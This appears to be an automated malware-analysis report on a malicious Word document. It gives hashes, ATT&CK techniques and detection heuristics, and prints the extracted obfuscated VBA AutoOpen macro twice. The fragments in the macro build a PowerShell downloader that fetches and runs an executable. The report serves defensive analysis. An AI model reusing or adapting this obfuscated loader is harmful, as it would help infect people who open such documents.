Office (OLE) malware analysis — malicious · fb9fc26235d7b3f7

MALICIOUS

Office (OLE)

131.5 KB Created: 2018-02-12 09:29:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: bfdbff64acdad0e1446402d4160c552e SHA-1: 28402dcc6a578e90e8f26f27ecc919a7dbb86d76 SHA-256: fb9fc26235d7b3f7465a6da2d0a60ebf395785372d06a16c9f558b773b0b2c01

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro with an AutoOpen function. This macro utilizes obfuscated code and calls to Shell() to download and execute a second-stage payload. The presence of the 'Doc.Dropper.Agent-6446845-0' ClamAV detection further confirms its malicious nature as a dropper.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6446845-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6446845-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26732 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	26732 bytes
SHA-256: `bd11291b56399fb831defe163893dd74de44029c7f5106f8468d50b72479f54c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "btGXzLIfLi" Sub AutoOpen() On Error Resume Next oauuKfrid = zTVtIsGSdGSX - Sgn(NEpMNprwEzz) - (2370919 - Tan(2744206) / 9993227 - ChrW(RwpDKp)) aJnaPAiGM = BQrjqVTipmqu - Sgn(WhtssAi) - (3315296 - Tan(2903471) / 2610887 - ChrW(nuBlzpIqrKzvW)) TYvfKNXzf = RtVHpFiXlCwt - Sgn(UhjAizDKYlXZUE) - (9732246 - Tan(1269575) / 249057 - ChrW(tHFkrchTlJmL)) Application.Run "ULfEMDIR", rCJMNTapIB tYacbwdNt = cisIwiVAjRkMFl - Sgn(kpESLOtYMszw) - (8472168 - Tan(5713343) / 28349 - ChrW(nztibrjiz)) zkZVbjSom = IZuiljGfQzjd - Sgn(jowPLGOs) - (1218591 - Tan(5013416) / 3745211 - ChrW(dUClLj)) KGmrCtPIv = MSfPUNp - Sgn(iRHiXwCzbU) - (1397785 - Tan(2874928) / 596708 - ChrW(ESZXkslDADKtf)) End Sub Function rCJMNTapIB() On Error Resume Next iDXVFFskN = YYEJkQDCZknh - Sgn(DqqBbqa) - (2228222 - Tan(935644) / 3096206 - ChrW(AXFojQKXjQzWv)) zONpJPvK = UcKzRvNZataWH - Sgn(vbiT) - (1637255 - Tan(1971208) / 1720900 - ChrW(LOVJZQ)) wVzThcHjh = CDUuGGNPNnUjaw - Sgn(OKJDc) - (1526539 - Tan(7273027) / 6107636 - ChrW(llHRwb)) KtEbnwb = GtYsJlH + Mid(vADFtNAr + "DAzkK9+8TE+8TEoA9d = oA9+oA9&oA9+'+'oA9(zfsn'+'zfs+zfsoA9+aG2+aG2oA9e8TE+8TEzoA9+oAaG2+aG29fs+zoA9+oA9fsw-obo8TE+8TEA9+oA9jecoA9+oA9zfs+8TE+8TEzfsoA9+oA9tzoA9+oA8TE+8TE9fCnOPkaADkdXPBZ" + BGuwRMIilB, 6, 165) mJwTMAOziuF = RXGIVzwTmfzj - Sgn(YXHiICuvUzaIDq) - (3568260 - Tan(9193650) / 3180523 - ChrW(wJmG)) HjjNTG = ATiBksf - Sgn(ouj) - (8622796 - Tan(5355635) / 8530955 - ChrW(rTttwYfAR)) UsQCb = dXVYA - Sgn(MRFHPdBJD) - (8018379 - Tan(9708660) / 7356495 - ChrW(UzqDnP)) sXcTYLFuKt = VzcXpGcA + Mid(hLR + "jG2+aG2+ sh9NSoA9+oA9BoA9+oaG28TE+8TE+aG2'+'A9 + 8TE+8TE(oA9+oA9zfs.exzf8TE+8T'+'EsaG8TE+8T'+'E2+aG28TE+8TE+zfsYppcqrMpohGDTw" + ndiRwALAWo, 2, 110) zwJukFTP = KTHMnwQJ - Sgn(jjW) - (9788439 - Tan(8847012) / 9487755 - ChrW(USaBMjCD)) IkporiwSzim = bjPfUAb - Sgn(RJCTJzR) - (9413932 - Tan(1657159) / 6289607 - ChrW(aDus)) oNENWrwh = pSB - Sgn(HJiR) - (740584 - Tan(8925960) / 2320071 - ChrW(BdiiEC)) ZEMidKpiTAD = PsKsUSNrHUJ + Mid(nTWbWkNNS + "RfBldWAzWwFRtYqhP);break;oA98TE+8TEaG2+aG28TE+8TE+oA9}catch{}}oA9).REplaCE(([CH8TE+8TEa8TE+8TEr]1'+'22'+'+[CHar]102+[CHar]115),[StrinG][CHar]39).REplaCE(o'+'A9qXC'+'oA9,[StrinG][CHar]92).REplaaG2+aVrbLHVrP" + qGatmzMnUhJ, 18, 180) qfFUqnluz = WBMHFnHj - Sgn(CGfWaffcmnhkjr) - (5051580 - Tan(1202867) / 1719755 - ChrW(wjHJYBXGNTj)) paaRWmQiLMw = CuSWJ - Sgn(zPp) - (6706837 - Tan(1147201) / 4866200 - ChrW(qQomK)) AsEWrFjQuZn = BwBKwqthdzT - Sgn(LwdlmRN) - (6515896 - Tan(4790969) / 1329489 - ChrW(zNdiAikiUDhiM)) tXTUOiAJjw = kuCLVJEDzvdO + Mid(nPpBwULHil + "XT &( $vERboseprefEReNcE.tostriNg()[1,3]+'X'hCSdpZXNziOFlcp" + OlBviz, 3, 42) DvlYJmRzunL = wsQzOiRRkCwiS - Sgn(ldcz) - (6848099 - Tan(975807) / 3887508 - ChrW(HMvbTjIzn)) cFQVsSqTca = XWV - Sgn(AVBPLOUbZ) - (8139453 - Tan(1908239) / 1738807 - ChrW(abzjD)) KqITYAmP = VlDDnLhI - Sgn(OuLwjIdGvUt) - (1069391 - Tan(1617830) / 6176230 - ChrW(FRKaiWoSTwz)) oMnjOBDh = kVfPUVQ + Mid(QudfFdW + "JuNikJvhsVXlvdTE9+oA9C);&(oA8TE+8ozNQJttwCQtd" + cNuDDwTI, 15, 19) QjVKKHMCfv = zaTHaD - Sgn(ZlBlDJdmlfT) - (8425714 - Tan(502970) / 4503946 - ChrW(RlDnOqjQfV)) JXBbSZMmpS = uUmlIXSQjoOoXh - Sgn(zfAUpOrT) - (1789913 - Tan(6541552) / 740355 - ChrW(ouqUWPFOIzA)) NiwLLALhEG = wZmqrCzf - Sgn(ssDQ) - (2047517 - Tan(6125935) / 7017367 - ChrW(Add)) QIQXPAwMB = wRODiGhMffNZA + Mid(UDPJTNFQwWBGaQ + "wmFWanoaG2+aG2A9+oA9iganNgGtEaG2+aG2oA9+oA9(), oA9+oA9'+'soA9+oA9h9oA9+8TE+8TEoA9SDoA8TE+8KhJDJVTXVjUpmmZpp" + brzjRjohQ, 5, 86) TZQrpQIwA = LjUL - Sgn(VwRL) - (9058110 - Tan(3048833) / 25626 - ChrW(KXMnjuYm)) OoUGMmHNA = PICYWShEiUD - Sgn(jpwHEc) - (6758426 - Tan(2263644) / 2500323 - ChrW(MAFvNLt)) ujjHXZzHbs = HORZUM - Sgn(jzdkH) - (2497977 - Tan(9133619) / 9339270 - ChrW(iiOj)) ipZwEOFTjf = kdWqUsZ + Mid(SMw ... (truncated)

SHA-256: bd11291b56399fb831defe163893dd74de44029c7f5106f8468d50b72479f54c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "btGXzLIfLi"
Sub AutoOpen()
On Error Resume Next
oauuKfrid = zTVtIsGSdGSX - Sgn(NEpMNprwEzz) - (2370919 - Tan(2744206) / 9993227 - ChrW(RwpDKp))
aJnaPAiGM = BQrjqVTipmqu - Sgn(WhtssAi) - (3315296 - Tan(2903471) / 2610887 - ChrW(nuBlzpIqrKzvW))
TYvfKNXzf = RtVHpFiXlCwt - Sgn(UhjAizDKYlXZUE) - (9732246 - Tan(1269575) / 249057 - ChrW(tHFkrchTlJmL))
Application.Run "ULfEMDIR", rCJMNTapIB
tYacbwdNt = cisIwiVAjRkMFl - Sgn(kpESLOtYMszw) - (8472168 - Tan(5713343) / 28349 - ChrW(nztibrjiz))
zkZVbjSom = IZuiljGfQzjd - Sgn(jowPLGOs) - (1218591 - Tan(5013416) / 3745211 - ChrW(dUClLj))
KGmrCtPIv = MSfPUNp - Sgn(iRHiXwCzbU) - (1397785 - Tan(2874928) / 596708 - ChrW(ESZXkslDADKtf))
End Sub
Function rCJMNTapIB()
On Error Resume Next
iDXVFFskN = YYEJkQDCZknh - Sgn(DqqBbqa) - (2228222 - Tan(935644) / 3096206 - ChrW(AXFojQKXjQzWv))
zONpJPvK = UcKzRvNZataWH - Sgn(vbiT) - (1637255 - Tan(1971208) / 1720900 - ChrW(LOVJZQ))
wVzThcHjh = CDUuGGNPNnUjaw - Sgn(OKJDc) - (1526539 - Tan(7273027) / 6107636 - ChrW(llHRwb))
KtEbnwb = GtYsJlH + Mid(vADFtNAr + "DAzkK9+8TE+8TEoA9d = oA9+oA9&oA9+'+'oA9(zfsn'+'zfs+zfsoA9+aG2+aG2oA9e8TE+8TEzoA9+oAaG2+aG29fs+zoA9+oA9fsw-obo8TE+8TEA9+oA9jecoA9+oA9zfs+8TE+8TEzfsoA9+oA9tzoA9+oA8TE+8TE9fCnOPkaADkdXPBZ" + BGuwRMIilB, 6, 165)
mJwTMAOziuF = RXGIVzwTmfzj - Sgn(YXHiICuvUzaIDq) - (3568260 - Tan(9193650) / 3180523 - ChrW(wJmG))
HjjNTG = ATiBksf - Sgn(ouj) - (8622796 - Tan(5355635) / 8530955 - ChrW(rTttwYfAR))
UsQCb = dXVYA - Sgn(MRFHPdBJD) - (8018379 - Tan(9708660) / 7356495 - ChrW(UzqDnP))
sXcTYLFuKt = VzcXpGcA + Mid(hLR + "jG2+aG2+ sh9NSoA9+oA9BoA9+oaG28TE+8TE+aG2'+'A9 + 8TE+8TE(oA9+oA9zfs.exzf8TE+8T'+'EsaG8TE+8T'+'E2+aG28TE+8TE+zfsYppcqrMpohGDTw" + ndiRwALAWo, 2, 110)
zwJukFTP = KTHMnwQJ - Sgn(jjW) - (9788439 - Tan(8847012) / 9487755 - ChrW(USaBMjCD))
IkporiwSzim = bjPfUAb - Sgn(RJCTJzR) - (9413932 - Tan(1657159) / 6289607 - ChrW(aDus))
oNENWrwh = pSB - Sgn(HJiR) - (740584 - Tan(8925960) / 2320071 - ChrW(BdiiEC))
ZEMidKpiTAD = PsKsUSNrHUJ + Mid(nTWbWkNNS + "RfBldWAzWwFRtYqhP);break;oA98TE+8TEaG2+aG28TE+8TE+oA9}catch{}}oA9).REplaCE(([CH8TE+8TEa8TE+8TEr]1'+'22'+'+[CHar]102+[CHar]115),[StrinG][CHar]39).REplaCE(o'+'A9qXC'+'oA9,[StrinG][CHar]92).REplaaG2+aVrbLHVrP" + qGatmzMnUhJ, 18, 180)
qfFUqnluz = WBMHFnHj - Sgn(CGfWaffcmnhkjr) - (5051580 - Tan(1202867) / 1719755 - ChrW(wjHJYBXGNTj))
paaRWmQiLMw = CuSWJ - Sgn(zPp) - (6706837 - Tan(1147201) / 4866200 - ChrW(qQomK))
AsEWrFjQuZn = BwBKwqthdzT - Sgn(LwdlmRN) - (6515896 - Tan(4790969) / 1329489 - ChrW(zNdiAikiUDhiM))
tXTUOiAJjw = kuCLVJEDzvdO + Mid(nPpBwULHil + "XT &( $vERboseprefEReNcE.tostriNg()[1,3]+'X'hCSdpZXNziOFlcp" + OlBviz, 3, 42)
DvlYJmRzunL = wsQzOiRRkCwiS - Sgn(ldcz) - (6848099 - Tan(975807) / 3887508 - ChrW(HMvbTjIzn))
cFQVsSqTca = XWV - Sgn(AVBPLOUbZ) - (8139453 - Tan(1908239) / 1738807 - ChrW(abzjD))
KqITYAmP = VlDDnLhI - Sgn(OuLwjIdGvUt) - (1069391 - Tan(1617830) / 6176230 - ChrW(FRKaiWoSTwz))
oMnjOBDh = kVfPUVQ + Mid(QudfFdW + "JuNikJvhsVXlvdTE9+oA9C);&(oA8TE+8ozNQJttwCQtd" + cNuDDwTI, 15, 19)
QjVKKHMCfv = zaTHaD - Sgn(ZlBlDJdmlfT) - (8425714 - Tan(502970) / 4503946 - ChrW(RlDnOqjQfV))
JXBbSZMmpS = uUmlIXSQjoOoXh - Sgn(zfAUpOrT) - (1789913 - Tan(6541552) / 740355 - ChrW(ouqUWPFOIzA))
NiwLLALhEG = wZmqrCzf - Sgn(ssDQ) - (2047517 - Tan(6125935) / 7017367 - ChrW(Add))
QIQXPAwMB = wRODiGhMffNZA + Mid(UDPJTNFQwWBGaQ + "wmFWanoaG2+aG2A9+oA9iganNgGtEaG2+aG2oA9+oA9(), oA9+oA9'+'soA9+oA9h9oA9+8TE+8TEoA9SDoA8TE+8KhJDJVTXVjUpmmZpp" + brzjRjohQ, 5, 86)
TZQrpQIwA = LjUL - Sgn(VwRL) - (9058110 - Tan(3048833) / 25626 - ChrW(KXMnjuYm))
OoUGMmHNA = PICYWShEiUD - Sgn(jpwHEc) - (6758426 - Tan(2263644) / 2500323 - ChrW(MAFvNLt))
ujjHXZzHbs = HORZUM - Sgn(jzdkH) - (2497977 - Tan(9133619) / 9339270 - ChrW(iiOj))
ipZwEOFTjf = kdWqUsZ + Mid(SMw
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.